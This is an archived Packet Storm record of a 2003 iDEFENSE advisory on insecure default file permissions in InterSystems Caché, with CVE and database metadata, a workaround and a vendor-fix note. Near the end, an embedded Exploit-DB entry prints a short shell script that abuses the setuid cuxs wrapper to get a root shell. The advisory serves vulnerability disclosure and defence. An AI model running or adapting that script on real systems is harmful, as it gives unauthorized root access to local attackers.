ID PACKETSTORM:31292 Type packetstorm Reporter Larry W. Cashdollar Modified 2003-07-03T00:00:00
Description
`
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 07.01.03:
http://www.idefense.com/advisory/07.01.03.txt
Caché Insecure Installation File and Directory Permissions
July 1, 2003
I. BACKGROUND
InterSystems Corp.s Caché is a post-relational database for
e-applications that is optimized for web applications. More information
about the application is available at
http://www.intersystems.com/cache/index.html .
II. DESCRIPTION
Caché installs with insecure file and directory permissions, thereby
allowing local attackers to gain root access by manipulating items in
the main package tree. The vulnerability specifically exists because
files and directories are open to all users for read, write, and
execute operations. An example of such a directory is the ecache/bin
directory:
[farmer@vmlinux ecache]$ ls -ld bin
drwxrwxrwx 2 root root 4096 May 2 05:34 bin
The displayed permissions are that of a default install.
III. ANALYSIS
Two attack vectors exist by which any local attacker can gain root
privileges:
* Overwriting a globally writeable binary that is executed from a set
user id (setuid) root binary by the wrapper, /cachesys/bin/cuxs.
* Executing a server side script from /cachesys/csp/user. The content
in that directory is executed as root through the web interface.
IV. DETECTION
Caché Database 5.x is affected. Older versions may be vulnerable as
well.
V. WORKAROUND
Administrators can prevent exploitation by making file permissions more
restrictive. This should prevent attackers from overwriting binaries or
placing scripts in /cachesys/csp/user.
VI. VENDOR FIX
InterSystems provided an alert to its customer base that is viewable at
http://www.intersystems.com/support/flash/index.html. In it, the
company said that the installation defaults will be changed in Caché
4.1.16 and 5.0.3.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification numbers to these issues:
CAN-2003-0497 overwrite Caché using setud cuxs program
CAN-2003-0498 code injection into /cachesys/csp
VIII. DISCLOSURE TIMELINE
11 MAR 2003 First attack vector disclosed to iDEFENSE
18 APR 2003 Second attack vector disclosed to iDEFENSE
10 JUN 2003 Research Completed on Issues
10 JUN 2003 InterSystems Corporation notifed
11 JUN 2003 Response from David Shambroom of InterSystems
01 JUL 2003 Coordinated Public Disclosure
IX. CREDIT
Larry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP
oo0XQnUmHaiPOM98pFIKow4n
=lKCb
-----END PGP SIGNATURE-----
To stop receiving iDEFENSE Security Advisories, reply to this message and put "unsubscribe" in the subject.
`
{"id": "PACKETSTORM:31292", "type": "packetstorm", "bulletinFamily": "exploit", "title": "intersystems.txt", "description": "", "published": "2003-07-03T00:00:00", "modified": "2003-07-03T00:00:00", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "href": "https://packetstormsecurity.com/files/31292/intersystems.txt.html", "reporter": "Larry W. Cashdollar", "references": [], "cvelist": ["CVE-2003-0497", "CVE-2003-0498"], "lastseen": "2016-12-05T22:15:46", "viewCount": 8, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-12-05T22:15:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0497", "CVE-2003-0498"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:4770"]}, {"type": "osvdb", "idList": ["OSVDB:2229", "OSVDB:11916"]}, {"type": "exploitdb", "idList": ["EDB-ID:22847"]}], "modified": "2016-12-05T22:15:46", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://packetstormsecurity.com/files/download/31292/intersystems.txt", "sourceData": "` \n-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \niDEFENSE Security Advisory 07.01.03: \nhttp://www.idefense.com/advisory/07.01.03.txt \nCach\u00e9 Insecure Installation File and Directory Permissions \nJuly 1, 2003 \n \nI. BACKGROUND \n \nInterSystems Corp.\u0092s Cach\u00e9 is a post-relational database for \ne-applications that is optimized for web applications. More information \nabout the application is available at \nhttp://www.intersystems.com/cache/index.html . \n \nII. DESCRIPTION \n \nCach\u00e9 installs with insecure file and directory permissions, thereby \nallowing local attackers to gain root access by manipulating items in \nthe main package tree. The vulnerability specifically exists because \nfiles and directories are open to all users for read, write, and \nexecute operations. An example of such a directory is the ecache/bin \ndirectory: \n \n[farmer@vmlinux ecache]$ ls -ld bin \ndrwxrwxrwx 2 root root 4096 May 2 05:34 bin \n \nThe displayed permissions are that of a default install. \n \nIII. ANALYSIS \n \nTwo attack vectors exist by which any local attacker can gain root \nprivileges: \n \n* Overwriting a globally writeable binary that is executed from a set \nuser id (setuid) root binary by the wrapper, /cachesys/bin/cuxs. \n \n* Executing a server side script from /cachesys/csp/user. The content \nin that directory is executed as root through the web interface. \n \nIV. DETECTION \n \nCach\u00e9 Database 5.x is affected. Older versions may be vulnerable as \nwell. \n \nV. WORKAROUND \n \nAdministrators can prevent exploitation by making file permissions more \nrestrictive. This should prevent attackers from overwriting binaries or \nplacing scripts in /cachesys/csp/user. \n \nVI. VENDOR FIX \n \nInterSystems provided an alert to its customer base that is viewable at \nhttp://www.intersystems.com/support/flash/index.html. In it, the \ncompany said that the installation defaults will be changed in Cach\u00e9 \n4.1.16 and 5.0.3. \n \nVII. CVE INFORMATION \n \nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project \nhas assigned the identification numbers to these issues: \n \nCAN-2003-0497 overwrite Cach\u00e9 using setud cuxs program \nCAN-2003-0498 code injection into /cachesys/csp \n \nVIII. DISCLOSURE TIMELINE \n \n11 MAR 2003 First attack vector disclosed to iDEFENSE \n18 APR 2003 Second attack vector disclosed to iDEFENSE \n10 JUN 2003 Research Completed on Issues \n10 JUN 2003 InterSystems Corporation notifed \n11 JUN 2003 Response from David Shambroom of InterSystems \n01 JUL 2003 Coordinated Public Disclosure \n \nIX. CREDIT \n \nLarry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability. \n \n \nGet paid for security research \nhttp://www.idefense.com/contributor.html \n \nSubscribe to iDEFENSE Advisories: \nsend email to listserv@idefense.com, subject line: \"subscribe\" \n \n \nAbout iDEFENSE: \n \niDEFENSE is a global security intelligence company that proactively \nmonitors sources throughout the world \u0097 from technical \nvulnerabilities and hacker profiling to the global spread of viruses \nand other malicious code. Our security intelligence services provide \ndecision-makers, frontline security professionals and network \nadministrators with timely access to actionable intelligence \nand decision support on cyber-related threats. For more information, \nvisit http://www.idefense.com . \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: PGP 8.0 \n \niQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP \noo0XQnUmHaiPOM98pFIKow4n \n=lKCb \n-----END PGP SIGNATURE----- \n \nTo stop receiving iDEFENSE Security Advisories, reply to this message and put \"unsubscribe\" in the subject. \n`\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Cach\u00e9 Database 5.x installs the /cachesys/csp directory with insecure permissions, which allows local users to execute arbitrary code by adding server-side scripts that are executed with root privileges.", "edition": 6, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0498", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0498"], "modified": "2020-02-10T21:05:00", "cpe": ["cpe:/a:intersystems:cache_database:5"], "id": "CVE-2003-0498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0498", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:intersystems:cache_database:5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:02", "description": "Cach\u00e9 Database 5.x installs /cachesys/bin/cache with world-writable permissions, which allows local users to gain privileges by modifying cache and executing it via cuxs.", "edition": 6, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0497", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0497"], "modified": "2020-02-10T21:05:00", "cpe": ["cpe:/a:intersystems:cache_database:5"], "id": "CVE-2003-0497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0497", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:intersystems:cache_database:5:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "cvelist": ["CVE-2003-0497", "CVE-2003-0498"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDEFENSE Security Advisory 07.01.03:\r\nhttp://www.idefense.com/advisory/07.01.03.txt\r\nCaché Insecure Installation File and Directory Permissions\r\nJuly 1, 2003\r\n\r\nI. BACKGROUND\r\n\r\nInterSystems Corp.\u2019s Caché is a post-relational database for\r\ne-applications that is optimized for web applications. More information\r\nabout the application is available at\r\nhttp://www.intersystems.com/cache/index.html .\r\n\r\nII. DESCRIPTION\r\n\r\nCach\u0439 installs with insecure file and directory permissions, thereby\r\nallowing local attackers to gain root access by manipulating items in\r\nthe main package tree. The vulnerability specifically exists because\r\nfiles and directories are open to all users for read, write, and\r\nexecute operations. An example of such a directory is the ecache/bin\r\ndirectory:\r\n\r\n[farmer@vmlinux ecache]$ ls -ld bin\r\ndrwxrwxrwx 2 root root 4096 May 2 05:34 bin\r\n\r\nThe displayed permissions are that of a default install.\r\n\r\nIII. ANALYSIS\r\n\r\nTwo attack vectors exist by which any local attacker can gain root\r\nprivileges:\r\n\r\n* Overwriting a globally writeable binary that is executed from a set\r\nuser id (setuid) root binary by the wrapper, /cachesys/bin/cuxs.\r\n\r\n* Executing a server side script from /cachesys/csp/user. The content\r\nin that directory is executed as root through the web interface.\r\n\r\nIV. DETECTION\r\n\r\nCaché Database 5.x is affected. Older versions may be vulnerable as\r\nwell.\r\n\r\nV. WORKAROUND\r\n\r\nAdministrators can prevent exploitation by making file permissions more\r\nrestrictive. This should prevent attackers from overwriting binaries or\r\nplacing scripts in /cachesys/csp/user.\r\n\r\nVI. VENDOR FIX\r\n\r\nInterSystems provided an alert to its customer base that is viewable at\r\nhttp://www.intersystems.com/support/flash/index.html. In it, the\r\ncompany said that the installation defaults will be changed in Caché\r\n4.1.16 and 5.0.3.\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project\r\nhas assigned the identification numbers to these issues:\r\n\r\nCAN-2003-0497 overwrite Cach\u0439 using setud cuxs program\r\nCAN-2003-0498 code injection into /cachesys/csp\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n11 MAR 2003 First attack vector disclosed to iDEFENSE\r\n18 APR 2003 Second attack vector disclosed to iDEFENSE\r\n10 JUN 2003 Research Completed on Issues\r\n10 JUN 2003 InterSystems Corporation notifed\r\n11 JUN 2003 Response from David Shambroom of InterSystems\r\n01 JUL 2003 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nLarry W. Cashdollar (lwc@vapid.ath.cx) discovered this vulnerability.\r\n\r\n\r\nGet paid for security research\r\nhttp://www.idefense.com/contributor.html\r\n\r\nSubscribe to iDEFENSE Advisories:\r\nsend email to listserv@idefense.com, subject line: "subscribe"\r\n\r\n\r\nAbout iDEFENSE:\r\n\r\niDEFENSE is a global security intelligence company that proactively\r\nmonitors sources throughout the world \u2014 from technical\r\nvulnerabilities and hacker profiling to the global spread of viruses\r\nand other malicious code. Our security intelligence services provide\r\ndecision-makers, frontline security professionals and network\r\nadministrators with timely access to actionable intelligence\r\nand decision support on cyber-related threats. For more information,\r\nvisit http://www.idefense.com .\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPwFrA/rkky7kqW5PEQInAACg+4f308YwrhJ8honIK5tFyAz4Fe8An2mP\r\noo0XQnUmHaiPOM98pFIKow4n\r\n=lKCb\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2003-07-02T00:00:00", "published": "2003-07-02T00:00:00", "id": "SECURITYVULNS:DOC:4770", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4770", "title": "[Full-Disclosure] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0498"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 2229](https://vulners.com/osvdb/OSVDB:2229)\nISS X-Force ID: 12476\n[CVE-2003-0498](https://vulners.com/cve/CVE-2003-0498)\nBugtraq ID: 8070\n", "modified": "2003-07-01T00:00:00", "published": "2003-07-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11916", "id": "OSVDB:11916", "title": "Cach\u00e9 Database /cachesys/csp Directory Weak Permission Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0497"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 12476\n[CVE-2003-0497](https://vulners.com/cve/CVE-2003-0497)\nBugtraq ID: 8070\n", "modified": "2003-07-01T06:34:37", "published": "2003-07-01T06:34:37", "href": "https://vulners.com/osvdb/OSVDB:2229", "id": "OSVDB:2229", "type": "osvdb", "title": "Cach\u00e9 Database /cachesys/bin/cache Weak Permission Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:40:50", "description": "InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability. CVE-2003-0497. Local exploit for linux platform", "published": "2003-07-01T00:00:00", "type": "exploitdb", "title": "InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0497"], "modified": "2003-07-01T00:00:00", "id": "EDB-ID:22847", "href": "https://www.exploit-db.com/exploits/22847/", "sourceData": "source: http://www.securityfocus.com/bid/8070/info\r\n\r\nIt has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.\r\n\r\n#!/bin/sh\r\n# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.\r\n# this started as an exploit for scenario1 in\r\n# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else\r\n# A snippetisnip from an strace of the cuxs binary shows:\r\n# execve(\"../bin/cache\", [\"cache\"], [/* 19 vars */])\r\n# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s\r\n\r\nTARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`\r\nmkdir -p crapche/bin\r\ncd crapche/bin\r\ncp `which ash` cache\r\n$TARGET\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22847/"}]}
